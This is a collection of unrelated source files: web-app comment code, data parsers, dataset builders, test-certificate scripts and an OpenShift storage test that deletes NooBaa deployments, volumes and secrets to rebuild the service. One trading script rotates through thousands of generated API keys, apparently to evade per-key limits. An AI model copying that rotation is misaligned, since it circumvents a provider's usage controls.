new_path = obj.referent.materialized_path.replace(source['materialized'], destination['materialized'])
new_file = BaseFileNode.resolve_class(destination['provider'], BaseFileNode.FILE).get_or_create(destination_node, new_path)
new_file.name = new_path.split('/')[-1]
new_file.materialized_path = new_path
new_file.save()
return new_file
def find_and_create_file_from_metadata(children, source, destination, destination_node, obj):
""" Given a Guid obj, recursively search for the metadata of its referent (a file obj)
in the waterbutler response. If found, create a new addon BaseFileNode with that metadata
and return the new file.
"""
for item in children:
# TODO: Remove when materialized paths are fixed in the payload returned from waterbutler
if not item['materialized'].startswith('/'):
item['materialized'] = '/' + item['materialized']
if item['kind'] == 'folder':
return find_and_create_file_from_metadata(item.get('children', []), source, destination, destination_node, obj)
elif item['kind'] == 'file' and item['materialized'].replace(destination['materialized'], source['materialized']) == obj.referent.materialized_path:
data = dict(item)
new_file = BaseFileNode.resolve_class(destination['provider'], BaseFileNode.FILE).get_or_create(destination_node, item['path'])
if destination['provider'] != 'osfstorage':
new_file.update(revision=None, data=data)
return new_file
def update_comment_node(root_target_id, source_node, destination_node):
Comment.objects.filter(root_target___id=root_target_id).update(node=destination_node)
source_node.save()
destination_node.save()
def render_email_markdown(content):
return markdown.markdown(content, ['del_ins', 'markdown.extensions.tables', 'markdown.extensions.fenced_code'])
@comment_added.connect
def send_comment_added_notification(comment, auth, new_mentions=None):
if not new_mentions:
new_mentions = []
node = comment.node
target = comment.target
context = dict(
profile_image_url=auth.user.profile_image_url(),
content=render_email_markdown(comment.content),
page_type=comment.get_comment_page_type(),
page_title=comment.get_comment_page_title(),
provider=PROVIDERS[comment.root_target.referent.provider] if comment.page == Comment.FILES else '',
target_user=target.referent.user if is_reply(target) else None,
parent_comment=target.referent.content if is_reply(target) else '',
url=comment.get_comment_page_url(),
exclude=new_mentions,
)
time_now = timezone.now()
sent_subscribers = notify(
event='comments',
user=auth.user,
node=node,
timestamp=time_now,
**context
)
if is_reply(target):
if target.referent.user and target.referent.user._id not in sent_subscribers:
notify(
event='global_comment_replies',
user=auth.user,
node=node,
timestamp=time_now,
**context
)
@mention_added.connect
def send_mention_added_notification(comment, new_mentions, auth):
node = comment.node
target = comment.target
context = dict(
profile_image_url=auth.user.profile_image_url(),
content=render_email_markdown(comment.content),
page_type='file' if comment.page == Comment.FILES else node.project_or_component,
page_title=comment.root_target.referent.name if comment.page == Comment.FILES else '',
provider=PROVIDERS[comment.root_target.referent.provider] if comment.page == Comment.FILES else '',
target_user=target.referent.user if is_reply(target) else None,
parent_comment=target.referent.content if is_reply(target) else '',
new_mentions=new_mentions,
url=comment.get_comment_page_url()
)
time_now = timezone.now()
notify_mentions(
event='global_mentions',
user=auth.user,
node=node,
timestamp=time_now,
**context
)
def is_reply(target):
return isinstance(target.referent, Comment)
def _update_comments_timestamp(auth, node, page=Comment.OVERVIEW, root_id=None):
if node.is_contributor_or_group_member(auth.user):
enqueue_postcommit_task(ban_url, (node, ), {}, celery=False, once_per_request=True)
if root_id is not None:
guid_obj = Guid.load(root_id)
if guid_obj is not None:
# FIXME: Doesn't work because we're not using Vanish anymore
# enqueue_postcommit_task(ban_url, (self.get_node(),), {}, celery=False, once_per_request=True)
pass
# update node timestamp
if page == Comment.OVERVIEW:
root_id = node._id
auth.user.comments_viewed_timestamp[root_id] = timezone.now()
auth.user.save()
return {root_id: auth.user.comments_viewed_timestamp[root_id].isoformat()}
else:
return {}
@must_be_contributor_or_public
def update_comments_timestamp(auth, node, **kwargs):
timestamp_info = request.get_json()
page = timestamp_info.get('page')
root_id = timestamp_info.get('rootId')
return _update_comments_timestamp(auth, node, page, root_id)
|
RePoE/parser/modules/cluster_jewels.py
|
brather1ng/RePoE
| 224 |
88309
|
from RePoE.parser.util import call_with_default_args, write_json
from RePoE.parser import Parser_Module
class cluster_jewels(Parser_Module):
@staticmethod
def write(file_system, data_path, relational_reader, translation_file_cache, ot_file_cache):
skills = {}
for row in relational_reader["PassiveTreeExpansionSkills.dat"]:
size = row["PassiveTreeExpansionJewelSizesKey"]["Name"]
if size not in skills:
skills[size] = []
skills[size].append(
{
"id": row["PassiveSkillsKey"]["Id"],
"name": row["PassiveSkillsKey"]["Name"],
"stats": {stat["Id"]: value for stat, value in row["PassiveSkillsKey"]["StatsZip"]},
"tag": row["TagsKey"]["Id"],
}
)
data = {}
for row in relational_reader["PassiveTreeExpansionJewels.dat"]:
size = row["PassiveTreeExpansionJewelSizesKey"]["Name"]
data[row["BaseItemTypesKey"]["Id"]] = {
"name": row["BaseItemTypesKey"]["Name"],
"size": size,
"min_skills": row["MinNodes"],
"max_skills": row["MaxNodes"],
"small_indices": row["SmallIndices"],
"notable_indices": row["NotableIndices"],
"socket_indices": row["SocketIndices"],
"total_indices": row["TotalIndices"],
"passive_skills": skills[size],
}
write_json(data, data_path, "cluster_jewels")
if __name__ == "__main__":
call_with_default_args(cluster_jewels.write)
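# --- Editor's hedged sketch of the output shape (not generated by the code above) ---
# Illustrative only: the base item id, names and numbers below are invented;
# the real keys and values come from the .dat tables read in write().
#   {
#     "Metadata/Items/Jewels/ExampleClusterJewel": {
#       "name": "Small Cluster Jewel", "size": "Small",
#       "min_skills": 2, "max_skills": 3,
#       "small_indices": [...], "notable_indices": [...],
#       "socket_indices": [...], "total_indices": 3,
#       "passive_skills": [{"id": "...", "name": "...", "stats": {"...": 10}, "tag": "..."}]
#     }
#   }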
|
vendor/src/github.com/Workiva/go-datastructures/fibheap/Test Generator/Merge.py
|
ylankgz/amazon-ssm-agent
| 6,943 |
88322
|
import random
l1 = []
l2 = []
for i in range(20):
l1.append(random.uniform(-1E10, 1E10))
l2.append(random.uniform(-1E10, 1E10))
print(l1)
print(l2)
l = []
l.extend(l1)
l.extend(l2)
print(sorted(l))
'''
[6015943293.071386, -3878285748.0708866, 8674121166.062424, -1528465047.6118088,
7584260716.494843, -373958476.80486107, -6367787695.054295, 6813992306.719868,
5986097626.907181, 9011134545.052086, 7123644338.268343, 2646164210.08445,
4407427446.995375, -888196668.2563229, 7973918726.985172, -6529216482.09644,
6079069259.51853, -8415952427.784341, -6859960084.757652, -502409126.89040375]
[9241165993.258648, -9423768405.578083, 3280085607.6687145, -5253703037.682413,
3858507441.2785892, 9896256282.896187, -9439606732.236805, 3082628799.5320206,
9453124863.59945, 9928066165.458393, 1135071669.4712334, 6380353457.986282,
8329064041.853199, 2382910730.445751, -8478491750.445316, 9607469190.690144,
5417691217.440792, -9698248424.421888, -3933774735.280322, -5984555343.381466]
[-9698248424.421888, -9439606732.236805, -9423768405.578083, -8478491750.445316,
-8415952427.784341, -6859960084.757652, -6529216482.09644, -6367787695.054295,
-5984555343.381466, -5253703037.682413, -3933774735.280322, -3878285748.0708866,
-1528465047.6118088, -888196668.2563229, -502409126.89040375,
-373958476.80486107, 1135071669.4712334, 2382910730.445751, 2646164210.08445,
3082628799.5320206, 3280085607.6687145, 3858507441.2785892, 4407427446.995375,
5417691217.440792, 5986097626.907181, 6015943293.071386, 6079069259.51853,
6380353457.986282, 6813992306.719868, 7123644338.268343, 7584260716.494843,
7973918726.985172, 8329064041.853199, 8674121166.062424, 9011134545.052086,
9241165993.258648, 9453124863.59945, 9607469190.690144, 9896256282.896187,
9928066165.458393]
'''
|
cape_webservices/app/app_saved_reply_endpoints.py
|
edwardmjackson/cape-webservices
| 164 |
88341
|
<gh_stars>100-1000
# Copyright 2018 BLEMUNDSBURY AI LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cape_webservices.app.app_settings import URL_BASE
from cape_webservices.app.app_settings import app_saved_reply_endpoints
from cape_webservices.app.app_middleware import respond_with_json, requires_auth
from cape_document_manager.annotation_store import AnnotationStore
from cape_api_helpers.output import list_response
from cape_api_helpers.input import required_parameter, optional_parameter, list_saved_reply_ids
_endpoint_route = lambda x: app_saved_reply_endpoints.route(URL_BASE + x, methods=['GET', 'POST'])
@_endpoint_route('/saved-replies/get-saved-replies')
@respond_with_json
@list_response
@list_saved_reply_ids
@requires_auth
def _get_saved_replies(request, number_of_items=30, offset=0, saved_reply_ids=None):
user_token = request['user'].token
search_term = optional_parameter(request, 'searchTerm', None)
saved_replies = AnnotationStore.get_annotations(user_token, annotation_ids=saved_reply_ids,
search_term=search_term, saved_replies=True)
return {'totalItems': len(saved_replies),
'items': saved_replies[offset:offset+number_of_items]}
@_endpoint_route('/saved-replies/add-saved-reply')
@respond_with_json
@requires_auth
def _create_saved_reply(request):
user_token = request['user'].token
question = required_parameter(request, 'question')
answer = required_parameter(request, 'answer')
response = AnnotationStore.create_annotation(user_token, question, answer)
return {'replyId': response['annotationId'], 'answerId': response['answerId']}
@_endpoint_route('/saved-replies/delete-saved-reply')
@respond_with_json
@requires_auth
def _delete_saved_reply(request):
user_token = request['user'].token
reply_id = required_parameter(request, 'replyId')
AnnotationStore.delete_annotation(user_token, reply_id)
return {'replyId': reply_id}
@_endpoint_route('/saved-replies/edit-canonical-question')
@respond_with_json
@requires_auth
def _edit_canonical_question(request):
user_token = request['user'].token
reply_id = required_parameter(request, 'replyId')
question = required_parameter(request, 'question')
AnnotationStore.edit_canonical_question(user_token, reply_id, question)
return {'replyId': reply_id}
@_endpoint_route('/saved-replies/add-paraphrase-question')
@respond_with_json
@requires_auth
def _add_paraphrase_question(request):
user_token = request['user'].token
reply_id = required_parameter(request, 'replyId')
question = required_parameter(request, 'question')
return AnnotationStore.add_paraphrase_question(user_token, reply_id, question)
@_endpoint_route('/saved-replies/edit-paraphrase-question')
@respond_with_json
@requires_auth
def _edit_paraphrase_question(request):
user_token = request['user'].token
question_id = required_parameter(request, 'questionId')
question = required_parameter(request, 'question')
return AnnotationStore.edit_paraphrase_question(user_token, question_id, question)
@_endpoint_route('/saved-replies/delete-paraphrase-question')
@respond_with_json
@requires_auth
def _delete_paraphrase_question(request):
user_token = request['user'].token
question_id = required_parameter(request, 'questionId')
return AnnotationStore.delete_paraphrase_question(user_token, question_id)
@_endpoint_route('/saved-replies/add-answer')
@respond_with_json
@requires_auth
def _add_answer(request):
user_token = request['user'].token
reply_id = required_parameter(request, 'replyId')
answer = required_parameter(request, 'answer')
return AnnotationStore.add_answer(user_token, reply_id, answer)
@_endpoint_route('/saved-replies/edit-answer')
@respond_with_json
@requires_auth
def _edit_answer(request):
user_token = request['user'].token
answer_id = required_parameter(request, 'answerId')
answer = required_parameter(request, 'answer')
return AnnotationStore.edit_answer(user_token, answer_id, answer)
@_endpoint_route('/saved-replies/delete-answer')
@respond_with_json
@requires_auth
def _delete_answer(request):
user_token = request['user'].token
answer_id = required_parameter(request, 'answerId')
return AnnotationStore.delete_answer(user_token, answer_id)
if __name__ == '__main__':
# import sanic.response
#
# # Create a fake request
# request = {
# "user": {
# "token": "test_user_token",
# },
# "args": {
# "token": '<KEY>',
# "question": 'What is a potato?',
# "answer": 'A potato is a vegetable',
# }
# }
# response: sanic.response.HTTPResponse = _create_saved_reply(request)
# print(response.body)
pass
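# --- Editor's hedged client-side sketch (not part of the service) ---
# One way the add-saved-reply endpoint above might be exercised over HTTP; the
# host, port and URL prefix are assumptions (the real prefix comes from URL_BASE).
#
# import requests
# resp = requests.post(
#     'http://localhost:5050/api/latest/saved-replies/add-saved-reply',  # hypothetical base URL
#     params={'token': '<user token>',
#             'question': 'What is a potato?',
#             'answer': 'A potato is a vegetable'})
# print(resp.json())   # expected to contain 'replyId' and 'answerId'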
|
dojo/db_migrations/0013_jira_info_level.py
|
mtcolman/django-DefectDojo
| 1,772 |
88345
|
# Generated by Django 2.2.1 on 2019-08-01 16:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dojo', '0012_jira_finding_age'),
]
operations = [
migrations.AddField(
model_name='jira_conf',
name='info_mapping_severity',
field=models.CharField(help_text="Maps to the 'Priority' field in Jira. For example: Info", max_length=200),
),
migrations.AlterField(
model_name='system_settings',
name='jira_minimum_severity',
field=models.CharField(blank=True, choices=[('Critical', 'Critical'), ('High', 'High'), ('Medium', 'Medium'), ('Low', 'Low'), ('Info', 'Info')], default='None', max_length=20, null=True),
),
]
|
docs/tools/chineselink.py
|
nbl97/nni
| 2,305 |
88388
|
"""
This keeps the Chinese docs up to date with the English docs. It should be run regularly.
There is no sane way to check the contents though; PR review should require contributors to update the corresponding translation.
See https://github.com/microsoft/nni/issues/4298 for discussion.
Under docs, run
python tools/chineselink.py
"""
import hashlib
import shutil
import sys
from pathlib import Path
def iterate_dir(path):
for p in Path(path).iterdir():
if p.is_dir():
yield from iterate_dir(p)
continue
yield p
suffix_list = [
'.html',
'.md',
'.rst',
'.ipynb',
]
pipeline_mode = len(sys.argv) > 1 and sys.argv[1] == 'check'
failed_files = []
# in case I need to change `_zh` to something else
# files = list(filter(lambda d: d.name.endswith('zh_CN.rst'), iterate_dir('source')))
# for file in files:
# os.rename(file, file.parent / (file.name[:-7] + file.name[-4:]))
def need_to_translate(source, target):
if not target.exists():
failed_files.append('(missing) ' + target.as_posix())
if pipeline_mode:
return
shutil.copyfile(source, target)
if target.suffix == '.html':
return # FIXME I don't know how to process html
    target_checksum = hashlib.sha256(source.open('rb').read()).hexdigest()[:32]
checksum = target.open('r').readline().strip()[3:]
if checksum != target_checksum:
failed_files.append('(out-of-date) ' + target.as_posix())
if pipeline_mode:
return
contents = target.open('r').readlines()
firstline = '.. ' + target_checksum + '\n'
if contents[0].startswith('.. '):
contents = [firstline] + contents[1:]
else:
contents = [firstline, '\n'] + contents
target.open('w').writelines(contents)
for path in iterate_dir(Path('source')):
relative_path = path.relative_to('source')
if relative_path.as_posix().startswith('_build'):
continue
if path.suffix in suffix_list:
if '_zh.' not in path.name:
target_path = path.parent / (path.stem + '_zh' + path.suffix)
if target_path.exists():
# whitelist files. should be translated
need_to_translate(path, target_path)
print(f'Skipped linking for {path} as it is in whitelist.')
else:
source_path = path.parent / (path.stem[:-3] + path.suffix)
if not source_path.exists():
# delete redundant files
                failed_files.append('(redundant) ' + path.as_posix())
                if not pipeline_mode:
                    print(f'Deleting {path}')
                    path.unlink()
if pipeline_mode and failed_files:
raise ValueError(
'The following files are not up-to-date. Please run "python3 tools/chineselink.py" under docs folder '
'to refresh them and update their corresponding translation.\n' + '\n'.join([' ' + line for line in failed_files]))
if failed_files:
print('Updated files:', failed_files)
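# --- Editor note (hedged): what the tracking header looks like ---
# Each translated *_zh.* file is expected to begin with a line of the form
#     .. <first 32 hex characters of the sha256 of the English source>
# e.g. (hash value invented for illustration):
#     .. 0123456789abcdef0123456789abcdef
# which is the checksum that need_to_translate() reads back and compares on the
# next run to decide whether the translation is out of date.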
|
create_data.py
|
pengzhou93/dancenet
| 499 |
88396
|
<gh_stars>100-1000
import cv2
import numpy as np
VIDEO_PATH = 'data.mkv'
kernel = np.ones((2,2),np.uint8)
cap = cv2.VideoCapture(VIDEO_PATH)
data = []
count = 1
limit = 0
while(cap.isOpened()):
ret, image_np = cap.read()
if ret == False:
break
if limit == 3:
limit = 0
#image_np = 255 - image_np
image_np = cv2.resize(image_np,(208,120))
#ret,image_np = cv2.threshold(image_np,127,255,cv2.THRESH_BINARY)
bg_index = np.where(np.greater(image_np,20))
image_np[bg_index] = 255
image_np = cv2.cvtColor(image_np, cv2.COLOR_BGR2GRAY)
#(T, thresh) = cv2.threshold(image_np, 0, 255, cv2.THRESH_BINARY)
cv2.imwrite("imgs/{}.jpg".format(count),image_np)
print("{}.jpg".format(count))
count += 1
limit += 1
|
Lib/objc/_CoreFollowUp.py
|
snazari/Pyto
| 701 |
88418
|
"""
Classes from the 'CoreFollowUp' framework.
"""
try:
from rubicon.objc import ObjCClass
except ValueError:
def ObjCClass(name):
return None
def _Class(name):
try:
return ObjCClass(name)
except NameError:
return None
FLApprovedItemsFilter = _Class("FLApprovedItemsFilter")
FLHSA2PasswordResetNotification = _Class("FLHSA2PasswordResetNotification")
FLItemChangeObserver = _Class("FLItemChangeObserver")
FLApprovedItemsDecorator = _Class("FLApprovedItemsDecorator")
FLHSA2LoginNotification = _Class("FLHSA2LoginNotification")
FLDaemon = _Class("FLDaemon")
FLGroupViewModelImpl = _Class("FLGroupViewModelImpl")
FLTopLevelViewModel = _Class("FLTopLevelViewModel")
FLHeadlessExtensionLoader = _Class("FLHeadlessExtensionLoader")
FLItemDetailViewModel = _Class("FLItemDetailViewModel")
FLFollowUpAction = _Class("FLFollowUpAction")
FLFollowUpNotification = _Class("FLFollowUpNotification")
FLEnvironment = _Class("FLEnvironment")
FLHeadlessActionHandler = _Class("FLHeadlessActionHandler")
FLTelemetryAggregateController = _Class("FLTelemetryAggregateController")
FLFollowUpController = _Class("FLFollowUpController")
FLUtilities = _Class("FLUtilities")
FLTelemetryFactory = _Class("FLTelemetryFactory")
FLFollowUpItem = _Class("FLFollowUpItem")
FLConstants = _Class("FLConstants")
FLTelemetryProcessor = _Class("FLTelemetryProcessor")
FLExtensionHostContext = _Class("FLExtensionHostContext")
|
net/data/path_builder_unittest/self_issued_prioritization/generate-certs.py
|
zealoussnow/chromium
| 14,668 |
88420
|
#!/usr/bin/env python
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
A chain with a self-signed Root1 and a Root1 cross signed by Root2. The
cross-signed root has a newer notBefore date than the self-signed one.
"""
import sys
sys.path += ['../..']
import gencerts
DATE_A = '150101120000Z'
DATE_B = '150102120000Z'
DATE_Z = '180101120000Z'
root1 = gencerts.create_self_signed_root_certificate('Root1')
root1.set_validity_range(DATE_A, DATE_Z)
root2 = gencerts.create_self_signed_root_certificate('Root2')
root2.set_validity_range(DATE_A, DATE_Z)
root1_cross = gencerts.create_intermediate_certificate('Root1', root2)
root1_cross.set_key(root1.get_key())
root1_cross.set_validity_range(DATE_B, DATE_Z)
target = gencerts.create_end_entity_certificate('Target', root1)
target.set_validity_range(DATE_A, DATE_Z)
gencerts.write_chain('Root1', [root1], out_pem='root1.pem')
gencerts.write_chain('Root2', [root2], out_pem='root2.pem')
gencerts.write_chain(
'Root1 cross-signed by Root2, with a newer notBefore date'
' than Root1', [root1_cross],
out_pem='root1_cross.pem')
gencerts.write_chain('Target', [target], out_pem='target.pem')
|
ParlAI/parlai/tasks/hotpotqa/build.py
|
UmaTaru/run
| 163 |
88450
|
<gh_stars>100-1000
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Download and build the data if it does not exist.
import parlai.core.build_data as build_data
import os
import json
VERSION = '1'
TRAIN_FILENAME = 'hotpot_train_v{}.1.json'.format(VERSION)
DEV_DISTRACTOR_FILENAME = 'hotpot_dev_distractor_v{}.json'.format(VERSION)
DEV_FULLWIKI_FILENAME = 'hotpot_dev_fullwiki_v{}.json'.format(VERSION)
URL = 'http://curtis.ml.cmu.edu/datasets/hotpot/'
OUTPUT_FORMAT = 'text:{context_question}\t' 'labels:{answer}'
def _handle_data_point(data_point):
output = []
context_question_txt = ""
for [title, sentences_list] in data_point['context']:
sentences = '\\n'.join(sentences_list)
context_question_txt += '{}\\n{}\\n\\n'.format(title, sentences)
context_question_txt += data_point['question']
output = OUTPUT_FORMAT.format(
context_question=context_question_txt, answer=data_point['answer']
)
output += '\t\tepisode_done:True\n'
return output
def make_parlai_format(outpath, dtype, data):
print('building parlai:' + dtype)
with open(os.path.join(outpath, dtype + '.txt'), 'w') as fout:
for data_point in data:
fout.write(_handle_data_point(data_point))
def build(opt):
dpath = os.path.join(opt['datapath'], 'HotpotQA')
if not build_data.built(dpath, version_string=VERSION):
print('[building data: ' + dpath + ']')
if build_data.built(dpath):
# An older version exists, so remove these outdated files.
build_data.remove_dir(dpath)
build_data.make_dir(dpath)
# Download the data.
build_data.download(URL + TRAIN_FILENAME, dpath, TRAIN_FILENAME)
build_data.download(
URL + DEV_DISTRACTOR_FILENAME, dpath, DEV_DISTRACTOR_FILENAME
)
build_data.download(URL + DEV_FULLWIKI_FILENAME, dpath, DEV_FULLWIKI_FILENAME)
with open(os.path.join(dpath, TRAIN_FILENAME)) as f:
data = json.load(f)
make_parlai_format(dpath, 'train', data)
with open(os.path.join(dpath, DEV_DISTRACTOR_FILENAME)) as f:
data = json.load(f)
make_parlai_format(dpath, 'valid_distractor', data)
with open(os.path.join(dpath, DEV_FULLWIKI_FILENAME)) as f:
data = json.load(f)
make_parlai_format(dpath, 'valid_fullwiki', data)
# Mark the data as built.
build_data.mark_done(dpath, version_string=VERSION)
|
ijson/backends/yajl2_c.py
|
simonw/ijson
| 394 |
88451
|
<gh_stars>100-1000
#
# Contributed by <NAME> <<EMAIL>>
#
# ICRAR - International Centre for Radio Astronomy Research
# (c) UWA - The University of Western Australia, 2016
# Copyright by UWA (in the framework of the ICRAR)
#
'''
Wrapper for _yajl2 C extension module
'''
from ijson import common, compat, utils
from . import _yajl2
_get_buf_size = lambda kwargs: kwargs.pop('buf_size', 64 * 1024)
@utils.coroutine
def basic_parse_basecoro(target, **kwargs):
return _yajl2.basic_parse_basecoro(target.send, **kwargs)
def basic_parse_gen(file, **kwargs):
f = compat.bytes_reader(file)
buf_size = _get_buf_size(kwargs)
return _yajl2.basic_parse(f, buf_size, **kwargs)
def basic_parse_async(file, **kwargs):
buf_size = _get_buf_size(kwargs)
return _yajl2.basic_parse_async(file, buf_size, **kwargs)
@utils.coroutine
def parse_basecoro(target, **kwargs):
return _yajl2.parse_basecoro(target.send, **kwargs)
def parse_gen(file, **kwargs):
f = compat.bytes_reader(file)
buf_size = _get_buf_size(kwargs)
return _yajl2.parse(f, buf_size, **kwargs)
def parse_async(file, **kwargs):
buf_size = _get_buf_size(kwargs)
return _yajl2.parse_async(file, buf_size, **kwargs)
@utils.coroutine
def kvitems_basecoro(target, prefix, map_type=None, **kwargs):
return _yajl2.kvitems_basecoro(target.send, prefix, map_type, **kwargs)
def kvitems_gen(file, prefix, map_type=None, **kwargs):
f = compat.bytes_reader(file)
buf_size = _get_buf_size(kwargs)
return _yajl2.kvitems(f, buf_size, prefix, map_type, **kwargs)
def kvitems_async(file, prefix, map_type=None, **kwargs):
buf_size = _get_buf_size(kwargs)
return _yajl2.kvitems_async(file, buf_size, prefix, map_type, **kwargs)
@utils.coroutine
def items_basecoro(target, prefix, map_type=None, **kwargs):
return _yajl2.items_basecoro(target.send, prefix, map_type, **kwargs)
def items_gen(file, prefix, map_type=None, **kwargs):
f = compat.bytes_reader(file)
buf_size = _get_buf_size(kwargs)
return _yajl2.items(f, buf_size, prefix, map_type, **kwargs)
def items_async(file, prefix, map_type=None, **kwargs):
buf_size = _get_buf_size(kwargs)
return _yajl2.items_async(file, buf_size, prefix, map_type, **kwargs)
common.enrich_backend(globals())
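# Minimal usage sketch (the file name and prefix below are placeholders; this backend is
# normally selected through the public ijson API rather than imported directly):
#   import ijson.backends.yajl2_c as backend
#   with open("doc.json", "rb") as f:
#       for obj in backend.items_gen(f, "records.item"):
#           print(obj)
# The read buffer can be overridden per call, e.g. items_gen(f, "records.item", buf_size=16 * 1024).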
|
predefined_functions/initialisation.py
|
g-make-it/IG_Trading_Algo_Scripts_Python
| 186 |
88456
|
<reponame>g-make-it/IG_Trading_Algo_Scripts_Python
from trading_ig import IGService
from trading_ig.config import config
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# if you need to cache to DB your requests
from datetime import timedelta
import requests_cache
class Initialisation():
def __init__(self):
logging.basicConfig(level=logging.INFO)
self.counter = -1
self.initialise_connection()
def initialise_connection(self):
key = self.increment_api_key()
# expire_after = timedelta(hours=1)
# session = requests_cache.CachedSession(
# cache_name='cache', backend='sqlite', expire_after=expire_after
# )
# set expire_after=None if you don't want cache expiration
# set expire_after=0 if you don't want to cache queries
# no cache
ig_service = IGService(
config.username, config.password, key, config.acc_type
)
# if you want to globally cache queries
# ig_service = IGService(config.username, config.password, config.api_key, config.acc_type, session)
return ig_service
    # make sure that, once the object reaches the place where it is needed, you call createSession() to initialise the session
    def increment_api_key(self):
        # the key file holds 12000 api keys; return the key at the current counter
        # position and wrap around to the first key once the file is exhausted
        path = r"D:\Stock_Analysis\ig-markets-api-python-library-master\generate_api_keys\IG_api_keys_raw.txt"
        while True:
            self.counter += 1
            with open(path) as fp:
                for i, line in enumerate(fp):
                    if i == self.counter:
                        return line.rstrip("\n")
            # the counter has surpassed the last api key; start over from the first one
            self.counter = -1
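# Rough usage sketch (the create_session() call follows the trading_ig library and is an
# assumption, not part of this script):
#   init = Initialisation()
#   ig_service = init.initialise_connection()
#   ig_service.create_session()  # per the note above, the session must be created before use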
|
tests/pydecompile-test/decompiler-baselines/string_length.py
|
jaydeetay/pxt
| 977 |
88459
|
<gh_stars>100-1000
x = "Okay"
y = len(x)
|
tests/e2e/kcs/test_noobaa_rebuild.py
|
annagitel/ocs-ci
| 130 |
88471
|
<reponame>annagitel/ocs-ci<filename>tests/e2e/kcs/test_noobaa_rebuild.py<gh_stars>100-1000
import logging
import pytest
from ocs_ci.framework.testlib import (
ignore_leftovers,
E2ETest,
tier3,
skipif_openshift_dedicated,
skipif_external_mode,
)
from ocs_ci.helpers.sanity_helpers import Sanity
from ocs_ci.ocs import constants, defaults
from ocs_ci.ocs.constants import DEFAULT_NOOBAA_BUCKETCLASS, DEFAULT_NOOBAA_BACKINGSTORE
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources.pod import get_noobaa_pods
from ocs_ci.ocs.resources.pvc import get_pvc_objs
logger = logging.getLogger(__name__)
@tier3
@ignore_leftovers
@pytest.mark.polarion_id("OCS-2653")
@pytest.mark.bugzilla("1991361")
@pytest.mark.bugzilla("2019577")
@skipif_openshift_dedicated
@skipif_external_mode
class TestNoobaaRebuild(E2ETest):
"""
Test to verify noobaa rebuild.
"""
@pytest.fixture(autouse=True)
def init_sanity(self):
"""
Initialize Sanity instance
"""
self.sanity_helpers = Sanity()
@pytest.fixture(autouse=True)
def teardown_fixture(self, request):
"""
Teardown function
"""
def finalizer():
# Get the deployment replica count
deploy_obj = OCP(
kind=constants.DEPLOYMENT,
namespace=constants.OPENSHIFT_STORAGE_NAMESPACE,
)
noobaa_deploy_obj = deploy_obj.get(
resource_name=constants.NOOBAA_OPERATOR_DEPLOYMENT
)
if noobaa_deploy_obj["spec"]["replicas"] != 1:
logger.info(
f"Scaling back {constants.NOOBAA_OPERATOR_DEPLOYMENT} deployment to replica: 1"
)
deploy_obj.exec_oc_cmd(
f"scale deployment {constants.NOOBAA_OPERATOR_DEPLOYMENT} --replicas=1"
)
request.addfinalizer(finalizer)
def test_noobaa_rebuild(self, bucket_factory):
"""
Test case to verify noobaa rebuild. Verifies KCS: https://access.redhat.com/solutions/5948631
1. Stop the noobaa-operator by setting the replicas of noobaa-operator deployment to 0.
2. Delete the noobaa deployments/statefulsets.
3. Delete the PVC db-noobaa-db-0.
        4. Patch existing backingstores and bucketclasses to remove their finalizers.
        5. Delete the backingstores/bucketclasses.
6. Delete the noobaa secrets.
7. Restart noobaa-operator by setting the replicas back to 1.
8. Monitor the pods in openshift-storage for noobaa pods to be Running.
"""
dep_ocp = OCP(
kind=constants.DEPLOYMENT, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
)
state_ocp = OCP(
kind=constants.STATEFULSET, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
)
noobaa_pvc_obj = get_pvc_objs(pvc_names=["db-noobaa-db-pg-0"])
# Scale down noobaa operator
logger.info(
f"Scaling down {constants.NOOBAA_OPERATOR_DEPLOYMENT} deployment to replica: 0"
)
dep_ocp.exec_oc_cmd(
f"scale deployment {constants.NOOBAA_OPERATOR_DEPLOYMENT} --replicas=0"
)
# Delete noobaa deployments and statefulsets
logger.info("Deleting noobaa deployments and statefulsets")
dep_ocp.delete(resource_name=constants.NOOBAA_ENDPOINT_DEPLOYMENT)
state_ocp.delete(resource_name=constants.NOOBAA_DB_STATEFULSET)
state_ocp.delete(resource_name=constants.NOOBAA_CORE_STATEFULSET)
# Delete noobaa-db pvc
pvc_obj = OCP(
kind=constants.PVC, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
)
logger.info("Deleting noobaa-db pvc")
pvc_obj.delete(resource_name=noobaa_pvc_obj[0].name, wait=True)
pvc_obj.wait_for_delete(resource_name=noobaa_pvc_obj[0].name, timeout=300)
# Patch and delete existing backingstores
params = '{"metadata": {"finalizers":null}}'
bs_obj = OCP(
kind=constants.BACKINGSTORE, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
)
for bs in bs_obj.get()["items"]:
assert bs_obj.patch(
resource_name=bs["metadata"]["name"],
params=params,
format_type="merge",
), "Failed to change the parameter in backingstore"
logger.info(f"Deleting backingstore: {bs['metadata']['name']}")
bs_obj.delete(resource_name=bs["metadata"]["name"])
# Patch and delete existing bucketclass
bc_obj = OCP(
kind=constants.BUCKETCLASS, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
)
for bc in bc_obj.get()["items"]:
assert bc_obj.patch(
resource_name=bc["metadata"]["name"],
params=params,
format_type="merge",
), "Failed to change the parameter in bucketclass"
logger.info(f"Deleting bucketclass: {bc['metadata']['name']}")
bc_obj.delete(resource_name=bc["metadata"]["name"])
# Delete noobaa secrets
logger.info("Deleting noobaa related secrets")
dep_ocp.exec_oc_cmd(
"delete secrets noobaa-admin noobaa-endpoints noobaa-operator noobaa-server noobaa-root-master-key"
)
# Scale back noobaa-operator deployment
logger.info(
